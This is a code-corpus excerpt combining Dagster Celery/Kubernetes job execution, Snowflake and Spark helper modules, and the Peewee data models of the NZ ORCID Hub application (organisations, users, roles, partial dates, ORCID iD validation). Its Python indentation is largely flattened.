return _execute_plan
def create_k8s_job_task(celery_app, **task_kwargs):
@celery_app.task(bind=True, name='execute_step_k8s_job', **task_kwargs)
def _execute_step_k8s_job(
_self,
instance_ref_dict,
step_keys,
environment_dict,
mode,
repo_name,
repo_location_name,
run_id,
job_config_dict,
job_namespace,
load_incluster_config,
resources=None,
kubeconfig_file=None,
):
'''Run step execution in a K8s job pod.
'''
from dagster_k8s import DagsterK8sJobConfig, construct_dagster_graphql_k8s_job
from dagster_k8s.utils import get_pod_names_in_job, retrieve_pod_logs, wait_for_job_success
import kubernetes
check.dict_param(instance_ref_dict, 'instance_ref_dict')
check.list_param(step_keys, 'step_keys', of_type=str)
check.invariant(
len(step_keys) == 1, 'Celery K8s task executor can only execute 1 step at a time'
)
check.dict_param(environment_dict, 'environment_dict')
check.str_param(mode, 'mode')
check.str_param(repo_name, 'repo_name')
check.str_param(repo_location_name, 'repo_location_name')
check.str_param(run_id, 'run_id')
# Celery will serialize this as a list
job_config = DagsterK8sJobConfig.from_dict(job_config_dict)
check.inst_param(job_config, 'job_config', DagsterK8sJobConfig)
check.str_param(job_namespace, 'job_namespace')
check.bool_param(load_incluster_config, 'load_incluster_config')
resources = check.opt_inst_param(
resources, 'resources', kubernetes.client.V1ResourceRequirements
)
check.opt_str_param(kubeconfig_file, 'kubeconfig_file')
# For when launched via DinD or running the cluster
if load_incluster_config:
kubernetes.config.load_incluster_config()
else:
kubernetes.config.load_kube_config(kubeconfig_file)
instance_ref = InstanceRef.from_dict(instance_ref_dict)
instance = DagsterInstance.from_ref(instance_ref)
pipeline_run = instance.get_run_by_id(run_id)
check.invariant(pipeline_run, 'Could not load run {}'.format(run_id))
step_keys_str = ", ".join(step_keys)
# Ensure we stay below k8s name length limits
k8s_name_key = _get_k8s_name_key(run_id, step_keys)
job_name = 'dagster-stepjob-%s' % k8s_name_key
pod_name = 'dagster-stepjob-%s' % k8s_name_key
variables = {
'executionParams': {
'runConfigData': environment_dict,
'mode': mode,
'selector': {
'repositoryLocationName': repo_location_name,
'repositoryName': repo_name,
'pipelineName': pipeline_run.pipeline_name,
},
'executionMetadata': {'runId': run_id},
'stepKeys': step_keys,
}
}
args = ['-p', 'executePlan', '-v', seven.json.dumps(variables)]
job = construct_dagster_graphql_k8s_job(job_config, args, job_name, resources, pod_name)
# Running list of events generated from this task execution
events = []
# Post event for starting execution
engine_event = instance.report_engine_event(
'Executing steps {} in Kubernetes job {}'.format(step_keys_str, job.metadata.name),
pipeline_run,
EngineEventData(
[
EventMetadataEntry.text(step_keys_str, 'Step keys'),
EventMetadataEntry.text(job.metadata.name, 'Kubernetes Job name'),
EventMetadataEntry.text(pod_name, 'Kubernetes Pod name'),
EventMetadataEntry.text(job_config.job_image, 'Job image'),
EventMetadataEntry.text(job_config.image_pull_policy, 'Image pull policy'),
EventMetadataEntry.text(
str(job_config.image_pull_secrets), 'Image pull secrets'
),
EventMetadataEntry.text(
str(job_config.service_account_name), 'Service account name'
),
],
marker_end=DELEGATE_MARKER,
),
CeleryK8sJobEngine,
            # validated above that step_keys is of length 1, and it is not possible to use the
            # execution plan in this function (Celery K8s workers should not have access to user code)
step_key=step_keys[0],
)
events.append(engine_event)
kubernetes.client.BatchV1Api().create_namespaced_job(body=job, namespace=job_namespace)
wait_for_job_success(job.metadata.name, namespace=job_namespace)
pod_names = get_pod_names_in_job(job.metadata.name, namespace=job_namespace)
# Post engine event for log retrieval
engine_event = instance.report_engine_event(
'Retrieving logs from Kubernetes Job pods',
pipeline_run,
EngineEventData([EventMetadataEntry.text('\n'.join(pod_names), 'Pod names')]),
CeleryK8sJobEngine,
step_key=step_keys[0],
)
events.append(engine_event)
logs = []
for pod_name in pod_names:
raw_logs = retrieve_pod_logs(pod_name, namespace=job_namespace)
logs += raw_logs.split('\n')
res = parse_raw_log_lines(logs)
handle_execution_errors(res, 'executePlan')
step_events = handle_execute_plan_result(res)
events += step_events
serialized_events = [serialize_dagster_namedtuple(event) for event in events]
return serialized_events
return _execute_step_k8s_job
def make_app(config=None):
config = check.opt_inst_param(config, 'config', (CeleryConfig, CeleryK8sJobConfig))
app_args = config.app_args() if config is not None else {}
app_ = Celery('dagster', **app_args)
if config is None:
app_.config_from_object('dagster_celery.defaults', force=True)
if is_module_available('dagster_celery_config'):
# pylint: disable=protected-access
obj = force_mapping(app_.loader._smart_import('dagster_celery_config'))
app_.conf.update(obj)
app_.loader.import_module('celery.contrib.testing.tasks')
app_.conf.task_queues = [
Queue('dagster', routing_key='dagster.#', queue_arguments={'x-max-priority': 10})
]
app_.conf.task_routes = {
'execute_plan': {'queue': 'dagster', 'routing_key': 'dagster.execute_plan'},
'execute_step_k8s_job': {'queue': 'dagster', 'routing_key': 'dagster.execute_step_k8s_job'},
}
app_.conf.task_queue_max_priority = 10
app_.conf.task_default_priority = 5
return app_
app = make_app()
execute_plan = create_task(app)
execute_step_k8s_job = create_k8s_job_task(app)
def _get_k8s_name_key(run_id, step_keys):
'''Creates a unique (short!) identifier to name k8s objects based on run ID and step key(s).
K8s Job names are limited to 63 characters, because they are used as labels. For more info, see:
https://kubernetes.io/docs/concepts/overview/working-with-objects/names/
'''
check.str_param(run_id, 'run_id')
check.list_param(step_keys, 'step_keys', of_type=str)
    # Use a stable md5 hex digest rather than Python's hash(), which yields a signed (possibly negative), platform-dependent integer
name_hash = hashlib.md5(six.ensure_binary(run_id + '-'.join(step_keys)))
return name_hash.hexdigest()
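# Illustrative sketch only (not part of the original module): a quick check of the
# name-length budget used above. The 'dagster-stepjob-' prefix (16 chars) plus a
# 32-char md5 hex digest stays well under the 63-character Kubernetes name limit.
def _example_k8s_name_length():
    import hashlib
    digest = hashlib.md5(b"some-run-id" + b"-" + b"some_step_key").hexdigest()
    name = "dagster-stepjob-" + digest
    assert len(name) == 48  # 16 + 32, comfortably below 63
    return name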
```
#### File: dagster-snowflake/dagster_snowflake/solids.py
```python
from dagster import InputDefinition, Nothing, check, solid
def snowflake_solid_for_query(sql, parameters=None):
check.str_param(sql, 'sql')
check.opt_dict_param(parameters, 'parameters')
@solid(
input_defs=[InputDefinition('start', Nothing)],
required_resource_keys={'snowflake'},
tags={'kind': 'sql', 'sql': sql},
)
def snowflake_solid(context):
context.resources.snowflake.execute_query(sql=sql, parameters=parameters)
return snowflake_solid
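# Illustrative usage sketch (not part of the original module): calling the factory
# returns a solid that executes the given query via the 'snowflake' resource.
# 'my_hypothetical_table' is a made-up name; wiring the solid into a pipeline with a
# snowflake resource (e.g. dagster_snowflake's snowflake_resource) is assumed, not shown.
count_rows = snowflake_solid_for_query("SELECT COUNT(*) FROM my_hypothetical_table")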
```
#### File: dagster-spark/dagster_spark/utils.py
```python
import itertools
import os
from dagster import check
from .types import SparkSolidError
def flatten_dict(d):
def _flatten_dict(d, result, key_path=None):
        '''Iterate an arbitrarily nested dictionary and yield dot-notation key:value tuples.
        {'foo': {'bar': 3, 'baz': 1}, 'other': {'key': 1}} =>
        [('foo.bar', 3), ('foo.baz', 1), ('other.key', 1)]
'''
for k, v in d.items():
new_key_path = (key_path or []) + [k]
if isinstance(v, dict):
_flatten_dict(v, result, new_key_path)
else:
result.append(('.'.join(new_key_path), v))
result = []
if d is not None:
_flatten_dict(d, result)
return result
def parse_spark_config(spark_conf):
'''For each key-value pair in spark conf, we need to pass to CLI in format:
--conf "key=value"
'''
spark_conf_list = flatten_dict(spark_conf)
return format_for_cli(spark_conf_list)
def format_for_cli(spark_conf_list):
return list(
itertools.chain.from_iterable([('--conf', '{}={}'.format(*c)) for c in spark_conf_list])
)
def construct_spark_shell_command(
application_jar,
main_class,
master_url=None,
spark_conf=None,
deploy_mode=None,
application_arguments=None,
spark_home=None,
):
'''Constructs the spark-submit command for a Spark job.
'''
check.opt_str_param(master_url, 'master_url')
check.str_param(application_jar, 'application_jar')
spark_conf = check.opt_dict_param(spark_conf, 'spark_conf')
check.opt_str_param(deploy_mode, 'deploy_mode')
check.opt_str_param(application_arguments, 'application_arguments')
check.opt_str_param(spark_home, 'spark_home')
spark_home = spark_home if spark_home else os.environ.get('SPARK_HOME')
if spark_home is None:
raise SparkSolidError(
(
'No spark home set. You must either pass spark_home in config or '
'set $SPARK_HOME in your environment (got None).'
)
)
master_url = ['--master', master_url] if master_url else []
deploy_mode = ['--deploy-mode', deploy_mode] if deploy_mode else []
spark_shell_cmd = (
['{}/bin/spark-submit'.format(spark_home), '--class', main_class]
+ master_url
+ deploy_mode
+ parse_spark_config(spark_conf)
+ [application_jar]
        + ([application_arguments] if application_arguments else [])
)
return spark_shell_cmd
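# Small, self-contained sketch (not part of the original module) of the helpers above:
# a nested Spark config flattens to dot-notation keys and then to repeated --conf
# CLI arguments, as passed to spark-submit by construct_spark_shell_command.
def _example_spark_conf_formatting():
    conf = {"spark": {"app": {"name": "demo"}, "executor": {"memory": "2g"}}}
    assert flatten_dict(conf) == [("spark.app.name", "demo"), ("spark.executor.memory", "2g")]
    assert parse_spark_config(conf) == [
        "--conf", "spark.app.name=demo", "--conf", "spark.executor.memory=2g"]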
``` |
{
"source": "jpeerz/NZ-ORCID-Hub",
"score": 2
} |
#### File: NZ-ORCID-Hub/orcid_hub/models.py
```python
import copy
import csv
import json
import os
import random
import re
import secrets
import string
import uuid
import validators
from collections import namedtuple
from datetime import datetime
from hashlib import md5
from io import StringIO
from itertools import zip_longest
from urllib.parse import urlencode
import yaml
from flask_login import UserMixin, current_user
from peewee import BooleanField as BooleanField_
from peewee import (JOIN, BlobField, CharField, DateTimeField, DeferredRelation, Field,
FixedCharField, ForeignKeyField, IntegerField, Model, OperationalError,
PostgresqlDatabase, ProgrammingError, SmallIntegerField, TextField, fn)
from playhouse.shortcuts import model_to_dict
from pycountry import countries
from pykwalify.core import Core
from pykwalify.errors import SchemaError
from peewee_validates import ModelValidator
from . import app, db
from .config import DEFAULT_COUNTRY, ENV
ORCID_ID_REGEX = re.compile(r"^([X\d]{4}-?){3}[X\d]{4}$")
PARTIAL_DATE_REGEX = re.compile(r"\d+([/\-]\d+){,2}")
AFFILIATION_TYPES = (
"student",
"education",
"staff",
"employment",
)
try:
from enum import IntFlag
except ImportError: # pragma: no cover
from enum import IntEnum as IntFlag
class ModelException(Exception):
"""Applicaton model exception."""
pass
def validate_orcid_id(value):
"""Validate ORCID iD (both format and the check-sum)."""
if not value:
return
if not ORCID_ID_REGEX.match(value):
raise ValueError(
f"Invalid ORCID iD {value}. It should be in the form of 'xxxx-xxxx-xxxx-xxxx' where x is a digit."
)
check = 0
for n in value:
if n == '-':
continue
check = (2 * check + int(10 if n == 'X' else n)) % 11
if check != 1:
raise ValueError(f"Invalid ORCID iD {value} checksum. Make sure you have entered correct ORCID iD.")
def lazy_property(fn):
"""Make a property lazy-evaluated."""
attr_name = '_lazy_' + fn.__name__
@property
def _lazy_property(self):
if not hasattr(self, attr_name):
setattr(self, attr_name, fn(self))
return getattr(self, attr_name)
return _lazy_property
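# Minimal sketch (not part of the original module) of how @lazy_property caches:
# the wrapped function runs once per instance and the result is stored on the
# instance under the '_lazy_<name>' attribute.
class _LazyDemo:
    calls = 0
    @lazy_property
    def answer(self):
        _LazyDemo.calls += 1
        return 42
def _example_lazy_property():
    demo = _LazyDemo()
    assert demo.answer == 42 and demo.answer == 42
    assert _LazyDemo.calls == 1  # computed only once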
class PartialDate(namedtuple("PartialDate", ["year", "month", "day"])):
"""Partial date (without month day or both month and month day."""
def as_orcid_dict(self):
"""Return ORCID dictionary representation of the partial date."""
if self.year is None and self.month is None and self.day is None:
return None
return dict(((f, None if v is None else {
"value": ("%04d" if f == "year" else "%02d") % v
}) for (f, v) in zip(self._fields, self)))
@classmethod
def create(cls, value):
"""Create a partial date form ORCID dictionary representation or string.
>>> PartialDate.create({"year": {"value": "2003"}}).as_orcid_dict()
{'year': {'value': '2003'}, 'month': None, 'day': None}
>>> PartialDate.create({"year": {"value": "2003"}}).year
2003
>>> PartialDate.create("2003").year
2003
>>> PartialDate.create("2003-03")
2003-03
>>> PartialDate.create("2003-07-14")
2003-07-14
>>> PartialDate.create("2003/03")
2003-03
>>> PartialDate.create("2003/07/14")
2003-07-14
>>> PartialDate.create("03/2003")
2003-03
>>> PartialDate.create("14/07/2003")
2003-07-14
"""
if value is None or value == {}:
return None
if isinstance(value, str):
match = PARTIAL_DATE_REGEX.search(value)
if not match:
raise ModelException(f"Wrong partial date value '{value}'")
value0 = match[0]
if '/' in value0:
parts = value0.split('/')
return cls(*[int(v) for v in (parts[::-1] if len(parts[-1]) > 2 else parts)])
return cls(*[int(v) for v in value0.split('-')])
return cls(**{k: int(v.get("value")) if v else None for k, v in value.items()})
def as_datetime(self):
"""Get 'datetime' data representation."""
return datetime(self.year, self.month, self.day)
def __str__(self):
"""Get string representation."""
if self.year is None:
return ''
else:
res = "%04d" % int(self.year)
if self.month:
res += "-%02d" % int(self.month)
return res + "-%02d" % int(self.day) if self.day else res
PartialDate.__new__.__defaults__ = (None, ) * len(PartialDate._fields)
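# Illustrative sketch only (not part of the original module), complementing the
# doctests above: string parsing, ORCID dictionary output, and string rendering.
def _example_partial_date():
    pd = PartialDate.create("2003-07")
    assert str(pd) == "2003-07"
    assert pd.as_orcid_dict() == {"year": {"value": "2003"}, "month": {"value": "07"}, "day": None}
    assert str(PartialDate.create("14/07/2003")) == "2003-07-14"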
class OrcidIdField(FixedCharField):
"""ORCID iD value DB field."""
def __init__(self, *args, **kwargs):
"""Initialize ORCID iD data field."""
if "verbose_name" not in kwargs:
kwargs["verbose_name"] = "ORCID iD"
if "max_length" not in kwargs:
kwargs["max_length"] = 19
super().__init__(*args, **kwargs)
# TODO: figure out where to place the value validation...
# def coerce(self, value):
# validate_orcid_id(value)
# return super().coerce(value)
class BooleanField(BooleanField_):
"""BooleanField extension to support inversion in queries."""
def NOT(self): # noqa: N802
"""Negate logical value in SQL."""
return self.__invert__()
class PartialDateField(Field):
"""Partial date custom DB data field mapped to varchar(10)."""
db_field = "varchar(10)"
def db_value(self, value):
"""Convert into partial ISO date textual representation: YYYY-**-**, YYYY-MM-**, or YYYY-MM-DD."""
if value is None or not value.year:
return None
else:
res = "%04d" % int(value.year)
if value.month:
res += "-%02d" % int(value.month)
else:
return res + "-**-**"
return res + "-%02d" % int(value.day) if value.day else res + "-**"
def python_value(self, value):
"""Parse partial ISO date textual representation."""
if value is None:
return None
parts = [int(p) for p in value.split("-") if "*" not in p]
return PartialDate(**dict(zip_longest((
"year",
"month",
"day",
), parts)))
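# Illustrative sketch only (not part of the original module): the field stores a
# PartialDate as 'YYYY-MM-DD' with '**' placeholders and parses it back; a bare,
# unbound Field instance is enough to exercise db_value()/python_value().
def _example_partial_date_field():
    field = PartialDateField()
    assert field.db_value(PartialDate(2003)) == "2003-**-**"
    assert field.db_value(PartialDate(2003, 7)) == "2003-07-**"
    assert field.python_value("2003-07-**") == PartialDate(2003, 7)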
class Role(IntFlag):
"""
Enum used to represent user role.
    The model provides multi-role support, representing role sets as bitmaps.
"""
NONE = 0 # NONE
SUPERUSER = 1 # SuperUser
ADMIN = 2 # Admin
RESEARCHER = 4 # Researcher
TECHNICAL = 8 # Technical contact
ANY = 255 # ANY
def __eq__(self, other):
if isinstance(other, Role):
return self.value == other.value
return (self.name == other or self.name == getattr(other, 'name', None))
def __hash__(self):
return hash(self.name)
class Affiliation(IntFlag):
"""
Enum used to represent user affiliation (type) to the organisation.
    The model provides multiple-affiliation support, representing affiliation sets as bitmaps.
"""
NONE = 0 # NONE
EDU = 1 # Education
EMP = 2 # Employment
def __eq__(self, other):
if isinstance(other, Affiliation):
return self.value == other.value
return (self.name == other or self.name == getattr(other, 'name', None))
def __hash__(self):
return hash(self.name)
def __str__(self):
return ", ".join({
self.EDU: "Education",
self.EMP: "Employment"
}[a] for a in Affiliation if a & self)
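# Illustrative sketch only (not part of the original module): role and affiliation
# sets are plain bitmaps, so membership tests are bitwise ANDs, and Affiliation
# renders as a comma-separated list of labels.
def _example_role_and_affiliation_bitmaps():
    roles = Role.ADMIN | Role.TECHNICAL  # stored in the DB as the integer 10
    assert Role.ADMIN & roles and not (Role.SUPERUSER & roles)
    assert Role.ADMIN == "ADMIN"  # __eq__ also matches the role name
    assert str(Affiliation.EDU | Affiliation.EMP) == "Education, Employment"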
class BaseModel(Model):
"""Encapsulate commont bits and pieces of the model classes."""
def field_is_updated(self, field_name):
"""Test if field is 'dirty'."""
return any(field_name == f.name for f in self.dirty_fields)
@classmethod
def get(cls, *query, **kwargs):
"""Get a single model instance."""
if query and not kwargs and len(query) == 1 and isinstance(query[0], int):
return super().get(id=query[0])
return super().get(*query, **kwargs)
@classmethod
def model_class_name(cls):
"""Get the class name of the model."""
return cls._meta.name
def __to_dashes(self, o):
"""Replace '_' with '-' in the dict keys."""
if isinstance(o, (list, tuple)):
return [self.__to_dashes(e) for e in o]
elif isinstance(o, dict):
return {k.replace('_', '-'): self.__to_dashes(v) for k, v in o.items()}
return o
def to_dict(self,
to_dashes=False,
recurse=True,
backrefs=False,
only=None,
exclude=None,
seen=None,
extra_attrs=None,
fields_from_query=None,
max_depth=None):
"""Get dictionary representation of the model."""
o = model_to_dict(
self,
recurse=recurse,
backrefs=backrefs,
only=only,
exclude=exclude,
seen=seen,
extra_attrs=extra_attrs,
fields_from_query=fields_from_query,
max_depth=max_depth)
for k, v in o.items():
if isinstance(v, PartialDate):
o[k] = str(v)
if to_dashes:
return self.__to_dashes(o)
return o
def reload(self):
"""Refresh the object from the DB."""
newer_self = self.get(self._meta.primary_key == self._get_pk_value())
for field_name in self._meta.fields.keys():
val = getattr(newer_self, field_name)
setattr(self, field_name, val)
self._dirty.clear()
class Meta: # noqa: D101,D106
database = db
only_save_dirty = True
class ModelDeferredRelation(DeferredRelation):
"""Fixed DefferedRelation to allow inheritance and mixins."""
def set_model(self, rel_model):
"""Include model in the generated "related_name" to make it unique."""
for model, field, name in self.fields:
if isinstance(field, ForeignKeyField) and not field._related_name:
field._related_name = "%s_%s_set" % (model.model_class_name(), name)
super().set_model(rel_model)
DeferredUser = ModelDeferredRelation()
class AuditMixin(Model):
"""Mixing for getting data necessary for data change audit trail maintenace."""
created_at = DateTimeField(default=datetime.utcnow)
updated_at = DateTimeField(null=True, default=None)
# created_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
# updated_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
def save(self, *args, **kwargs): # noqa: D102
if self.is_dirty():
self.updated_at = datetime.utcnow()
if current_user and hasattr(current_user, "id"):
if hasattr(self, "created_by") and self.created_by and hasattr(self, "updated_by"):
self.updated_by_id = current_user.id
elif hasattr(self, "created_by"):
self.created_by_id = current_user.id
return super().save(*args, **kwargs)
class File(BaseModel):
"""Uploaded image files."""
filename = CharField(max_length=100)
data = BlobField()
mimetype = CharField(max_length=30, db_column="mime_type")
token = FixedCharField(max_length=8, unique=True, default=lambda: secrets.token_urlsafe(8)[:8])
class Organisation(BaseModel, AuditMixin):
"""Research oranisation."""
country_choices = [(c.alpha_2, c.name) for c in countries]
country_choices.sort(key=lambda e: e[1])
country_choices.insert(0, ("", "Country"))
name = CharField(max_length=100, unique=True, null=True)
tuakiri_name = CharField(max_length=80, unique=True, null=True)
if ENV != "prod":
orcid_client_id = CharField(max_length=80, null=True)
orcid_secret = CharField(max_length=80, null=True)
else: # pragma: no cover
orcid_client_id = CharField(max_length=80, unique=True, null=True)
orcid_secret = CharField(max_length=80, unique=True, null=True)
confirmed = BooleanField(default=False)
city = CharField(null=True)
state = CharField(null=True, verbose_name="State/Region", max_length=100)
country = CharField(null=True, choices=country_choices, default=DEFAULT_COUNTRY)
disambiguated_id = CharField(null=True)
disambiguation_source = CharField(null=True)
is_email_sent = BooleanField(default=False)
tech_contact = ForeignKeyField(
DeferredUser,
related_name="tech_contact_of",
on_delete="SET NULL",
null=True,
help_text="Organisation technical contact")
created_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
updated_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
api_credentials_requested_at = DateTimeField(
null=True,
help_text="The time stamp when the user clicked on the button to register client API.")
api_credentials_entered_at = DateTimeField(
null=True, help_text="The time stamp when the user entered API Client ID and secret.")
can_use_api = BooleanField(null=True, help_text="The organisation can access ORCID Hub API.")
logo = ForeignKeyField(
File, on_delete="CASCADE", null=True, help_text="The logo of the organisation")
email_template = TextField(null=True, db_column="email_template")
email_template_enabled = BooleanField(
null=True, default=False, db_column="email_template_enabled")
webhook_enabled = BooleanField(default=False, null=True)
email_notifications_enabled = BooleanField(default=False, null=True)
webhook_url = CharField(max_length=100, null=True)
@property
def invitation_sent_to(self):
"""Get the most recent invitation recepient."""
try:
return (self.orginvitation_set.select(
OrgInvitation.invitee).where(OrgInvitation.invitee_id == self.tech_contact_id)
.order_by(OrgInvitation.created_at.desc()).first().invitee)
except Exception:
return None
@property
def invitation_sent_at(self):
"""Get the timestamp of the most recent invitation sent to the technical contact."""
try:
return (self.orginvitation_set.select(
fn.MAX(OrgInvitation.created_at).alias("last_sent_at")).where(
OrgInvitation.invitee_id == self.tech_contact_id).first().last_sent_at)
except Exception:
return None
@property
def invitation_confirmed_at(self):
"""Get the timestamp when the invitation link was opened."""
try:
return (self.orginvitation_set.select(
fn.MAX(OrgInvitation.created_at).alias("last_confirmed_at")).where(
OrgInvitation.invitee_id == self.tech_contact_id).where(
OrgInvitation.confirmed_at.is_null(False)).first().last_confirmed_at)
except Exception:
return None
@property
def users(self):
"""Get organisation's user query."""
return User.select().join(
UserOrg, on=(UserOrg.user_id == User.id)).where(UserOrg.org == self)
@property
def admins(self):
"""Get organisation's adminstrator query."""
return self.users.where(UserOrg.is_admin)
def __repr__(self):
return self.name or self.tuakiri_name
def save(self, *args, **kwargs):
"""Handle data consitency validation and saving."""
if self.is_dirty():
if self.name is None:
self.name = self.tuakiri_name
if self.field_is_updated("tech_contact") and self.tech_contact:
if not self.tech_contact.has_role(Role.TECHNICAL):
self.tech_contact.roles |= Role.TECHNICAL
self.tech_contact.save()
app.logger.info(f"Added TECHNICAL role to user {self.tech_contact}")
super().save(*args, **kwargs)
class OrgInfo(BaseModel):
"""Preloaded organisation data."""
name = CharField(max_length=100, unique=True, verbose_name="Organisation")
tuakiri_name = CharField(max_length=100, unique=True, null=True, verbose_name="TUAKIRI Name")
    title = CharField(null=True, verbose_name="Contact person title")
first_name = CharField(null=True, verbose_name="Contact person's first name")
last_name = CharField(null=True, verbose_name="Contact person's last name")
role = CharField(null=True, verbose_name="Contact person's role")
email = CharField(null=True, verbose_name="Contact person's email")
phone = CharField(null=True, verbose_name="Contact person's phone")
is_public = BooleanField(
null=True, default=False, verbose_name="Permission to post contact information to WEB")
country = CharField(null=True, verbose_name="Country Code", default=DEFAULT_COUNTRY)
city = CharField(null=True, verbose_name="City of home campus")
disambiguated_id = CharField(
null=True, verbose_name="common:disambiguated-organization-identifier")
disambiguation_source = CharField(null=True, verbose_name="common:disambiguation-source")
def __repr__(self):
return self.name or self.disambiguated_id or super().__repr__()
class Meta: # noqa: D101,D106
db_table = "org_info"
table_alias = "oi"
@classmethod
def load_from_csv(cls, source):
"""Load data from CSV file or a string."""
if isinstance(source, str):
if '\n' in source:
source = StringIO(source)
else:
source = open(source)
reader = csv.reader(source)
header = next(reader)
assert len(header) >= 3, \
"Wrong number of fields. Expected at least 3 fields " \
"(name, disambiguated organisation ID, and disambiguation source). " \
"Read header: %s" % header
header_rexs = [
re.compile(ex, re.I)
for ex in ("organisation|name", "title", r"first\s*(name)?", r"last\s*(name)?", "role",
"email", "phone", "public|permission to post to web", r"country\s*(code)?",
"city", "(common:)?disambiguated.*identifier",
"(common:)?disambiguation.*source", r"tuakiri\s*(name)?")
]
def index(rex):
"""Return first header column index matching the given regex."""
for i, column in enumerate(header):
if rex.match(column):
return i
else:
return None
idxs = [index(rex) for rex in header_rexs]
def val(row, i, default=None):
if idxs[i] is None:
return default
else:
v = row[idxs[i]].strip()
return None if v == '' else v
for row in reader:
# skip empty lines:
if row is None or (len(row) == 1 and row[0].strip() == ''):
continue
name = val(row, 0)
oi, _ = cls.get_or_create(name=name)
oi.title = val(row, 1)
oi.first_name = val(row, 2)
oi.last_name = val(row, 3)
oi.role = val(row, 4)
oi.email = val(row, 5)
oi.phone = val(row, 6)
oi.is_public = val(row, 7) and val(row, 7).upper() == "YES"
oi.country = val(row, 8) or DEFAULT_COUNTRY
oi.city = val(row, 9)
oi.disambiguated_id = val(row, 10)
oi.disambiguation_source = val(row, 11)
oi.tuakiri_name = val(row, 12)
oi.save()
return reader.line_num - 1
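# Minimal sketch (not part of the original module) of the header-to-column mapping
# used inside OrgInfo.load_from_csv: each regex is matched against the header cells
# and the first matching column index wins. The header below is hypothetical.
def _example_orginfo_header_mapping():
    header = ["Organisation", "Title", "First name", "Last name", "Role", "Email"]
    rexs = [re.compile(ex, re.I) for ex in ("organisation|name", "title", r"first\s*(name)?", "email")]
    idxs = [next((i for i, col in enumerate(header) if rex.match(col)), None) for rex in rexs]
    assert idxs == [0, 1, 2, 5]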
class User(BaseModel, UserMixin, AuditMixin):
"""
    ORCID Hub user.
    It's a generic user, covering researchers, organisation administrators, hub administrators, etc.
"""
name = CharField(max_length=64, null=True)
    first_name = CharField(null=True, verbose_name="First Name")
last_name = CharField(null=True, verbose_name="Last Name")
email = CharField(max_length=120, unique=True, null=True)
eppn = CharField(max_length=120, unique=True, null=True)
# ORCiD:
orcid = OrcidIdField(null=True, verbose_name="ORCID iD", help_text="User's ORCID iD")
confirmed = BooleanField(default=False)
# Role bit-map:
roles = SmallIntegerField(default=0)
is_locked = BooleanField(default=False)
webhook_enabled = BooleanField(default=False, null=True)
orcid_updated_at = DateTimeField(null=True, default=None)
# TODO: many-to-many
    # NB! deprecated!
    # TODO: we still need to remember the organisation that last authenticated the user
organisation = ForeignKeyField(
Organisation, related_name="members", on_delete="CASCADE", null=True)
created_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
updated_by = ForeignKeyField(DeferredUser, on_delete="SET NULL", null=True)
def __repr__(self):
if self.name and (self.eppn or self.email):
return "%s (%s)" % (self.name, self.email or self.eppn)
return self.name or self.email or self.orcid or super().__repr__()
@property
def organisations(self):
"""Get all linked to the user organisation query."""
return (Organisation.select(
Organisation, (Organisation.tech_contact_id == self.id).alias("is_tech_contact"),
((UserOrg.is_admin.is_null(False)) & (UserOrg.is_admin)).alias("is_admin")).join(
UserOrg, on=((UserOrg.org_id == Organisation.id) & (UserOrg.user_id == self.id)))
.naive())
@property
def linked_accounts(self):
"""Get all linked accounts - accounts sharing the same ORCID ID."""
return [u for u in User.select().where(User.orcid == self.orcid)] if self.orcid else [self]
@property
def available_organisations(self):
"""Get all not yet linked to the user organisation query."""
return (Organisation.select(Organisation).where(UserOrg.id.is_null()).join(
UserOrg,
JOIN.LEFT_OUTER,
on=((UserOrg.org_id == Organisation.id) & (UserOrg.user_id == self.id))))
@property
def admin_for(self):
"""Get organisations the user is admin for (query)."""
return self.organisations.where(UserOrg.is_admin)
@property
def is_active(self):
"""Get 'is_active' based on confirmed for Flask-Login.
TODO: confirmed - user that email is cunfimed either by IdP or by confirmation email
ins't the same as "is active".
"""
return self.confirmed
def has_role(self, role):
"""Return `True` if the user identifies with the specified role.
:param role: A role name, `Role` instance, or integer value.
"""
if isinstance(role, Role):
return bool(role & Role(self.roles))
elif isinstance(role, str):
try:
return bool(Role[role.upper()] & Role(self.roles))
            except Exception:
                return False
elif type(role) is int:
return bool(role & self.roles)
else:
return False
@property
def is_superuser(self):
"""Test if the user is a HUB admin."""
return bool(self.roles & Role.SUPERUSER)
@is_superuser.setter
def is_superuser(self, value): # noqa: D401
"""Sets user as a HUB admin."""
if value:
self.roles |= Role.SUPERUSER
else:
self.roles &= ~Role.SUPERUSER
@property
def is_admin(self):
"""Test if the user belongs to the organisation admin."""
return bool(self.roles & Role.ADMIN)
def avatar(self, size=40, default="identicon"):
"""Return Gravatar service user avatar URL."""
# TODO: default gravatar image
# default = "https://www.example.com/default.jpg"
gravatar_url = "https://www.gravatar.com/avatar/" + md5(
self.email.lower().encode()).hexdigest() + "?"
gravatar_url += urlencode({'d': default, 's': str(size)})
return gravatar_url
@property
def gravatar_profile_url(self):
"""Return Gravatar service user profile URL."""
return "https://www.gravatar.com/" + md5(self.email.lower().encode()).hexdigest()
@property
def affiliations(self):
"""Return affiliations with the current organisation."""
try:
user_org = UserOrg.get(user=self, org=self.organisation)
return Affiliation(user_org.affiliations)
except UserOrg.DoesNotExist:
return Affiliation.NONE
def is_tech_contact_of(self, org=None):
"""Indicats if the user is the technical contact of the organisation."""
if org is None:
org = self.organisation
return org and org.tech_contact and org.tech_contact_id == self.id
def is_admin_of(self, org=None):
"""Indicats if the user is the technical contact of the organisation."""
if org is None:
org = self.organisation
return org and UserOrg.select().where(UserOrg.user == self, UserOrg.org == org, UserOrg.is_admin).exists()
@property
def uuid(self):
"""Generate UUID for the user basee on the the primary email."""
return uuid.uuid5(uuid.NAMESPACE_URL, "mailto:" + (self.email or self.eppn))
DeferredUser.set_model(User)
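# Illustrative sketch only (not part of the original module): a peewee model can be
# instantiated in memory without a database connection, which is enough to show the
# role-bitmap helpers and the deterministic UUID. The email address is made up.
def _example_user_roles():
    user = User(email="jane@example.edu", roles=Role.ADMIN | Role.TECHNICAL)
    assert user.has_role(Role.ADMIN) and user.has_role(Role.TECHNICAL)
    assert user.is_admin and not user.is_superuser
    assert user.uuid == uuid.uuid5(uuid.NAMESPACE_URL, "mailto:jane@example.edu")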
class OrgInvitation(BaseModel, AuditMixin):
"""Organisation invitation to on-board the Hub."""
invitee = ForeignKeyField(
User, on_delete="CASCADE", null=True, related_name="received_org_invitations")
inviter = ForeignKeyField(
